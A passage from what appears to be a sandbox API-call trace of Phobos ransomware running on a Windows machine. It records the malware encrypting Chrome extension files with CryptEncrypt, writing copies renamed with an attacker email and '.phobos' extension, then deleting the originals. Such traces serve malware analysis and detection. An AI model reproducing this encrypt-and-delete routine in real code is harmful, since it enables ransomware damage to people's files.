dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0162.963] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0162.963] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0162.963] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0162.963] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0162.963] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0162.963] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x794cf, lpOverlapped=0x0) returned 1 [0162.988] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x794d0, dwBufLen=0x794d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x794d0) returned 1 [0162.991] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x794d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x794d0, lpOverlapped=0x0) returned 1 [0162.999] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0162.999] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0162.999] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0162.999] CryptDestroyKey (hKey=0xa32da8) returned 1 [0162.999] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0162.999] CryptDestroyKey (hKey=0xa32968) returned 1 [0163.000] CloseHandle (hObject=0x17c) returned 1 [0163.000] CloseHandle (hObject=0x134) returned 1 [0163.000] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js")) returned 1 [0163.004] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0163.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0163.005] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=18471) returned 1 [0163.005] CloseHandle (hObject=0x134) returned 1 [0163.005] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json")) returned 0x2020 [0163.005] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0163.005] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0163.005] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0163.005] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0163.005] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0163.006] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0163.006] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0163.006] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x4827, lpOverlapped=0x0) returned 1 [0163.007] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4830, dwBufLen=0x4830 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4830) returned 1 [0163.007] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4830, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4830, lpOverlapped=0x0) returned 1 [0163.008] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0163.008] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0163.008] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0163.008] CryptDestroyKey (hKey=0xa32da8) returned 1 [0163.008] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0163.008] CryptDestroyKey (hKey=0xa32968) returned 1 [0163.008] CloseHandle (hObject=0x134) returned 1 [0163.009] CloseHandle (hObject=0x17c) returned 1 [0163.009] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json")) returned 1 [0163.009] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0163.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0163.010] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=17855) returned 1 [0163.010] CloseHandle (hObject=0x17c) returned 1 [0163.010] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json")) returned 0x2020 [0163.010] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0163.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0163.010] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0163.010] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0163.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0163.011] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0163.011] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0163.011] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x45bf, lpOverlapped=0x0) returned 1 [0163.012] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x45c0, dwBufLen=0x45c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x45c0) returned 1 [0163.012] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x45c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x45c0, lpOverlapped=0x0) returned 1 [0163.013] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0163.013] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0163.013] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0163.013] CryptDestroyKey (hKey=0xa32da8) returned 1 [0163.014] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0163.014] CryptDestroyKey (hKey=0xa32968) returned 1 [0163.014] CloseHandle (hObject=0x17c) returned 1 [0163.014] CloseHandle (hObject=0x134) returned 1 [0163.014] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json")) returned 1 [0163.015] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0163.015] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0163.015] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=19299) returned 1 [0163.015] CloseHandle (hObject=0x134) returned 1 [0163.015] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json")) returned 0x2020 [0163.015] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0163.015] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0163.015] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0163.015] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0163.015] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0163.016] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0163.016] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0163.016] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x4b63, lpOverlapped=0x0) returned 1 [0163.017] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4b70, dwBufLen=0x4b70 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4b70) returned 1 [0163.017] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4b70, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4b70, lpOverlapped=0x0) returned 1 [0163.018] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0163.018] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0163.018] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0163.018] CryptDestroyKey (hKey=0xa32da8) returned 1 [0163.018] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0163.019] CryptDestroyKey (hKey=0xa32968) returned 1 [0163.019] CloseHandle (hObject=0x134) returned 1 [0163.019] CloseHandle (hObject=0x17c) returned 1 [0163.019] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json")) returned 1 [0163.020] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0163.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0163.021] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=21195) returned 1 [0163.021] CloseHandle (hObject=0x17c) returned 1 [0163.021] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json")) returned 0x2020 [0163.021] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0163.021] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0163.021] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0163.021] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0163.021] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0163.022] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0163.022] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0163.022] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, 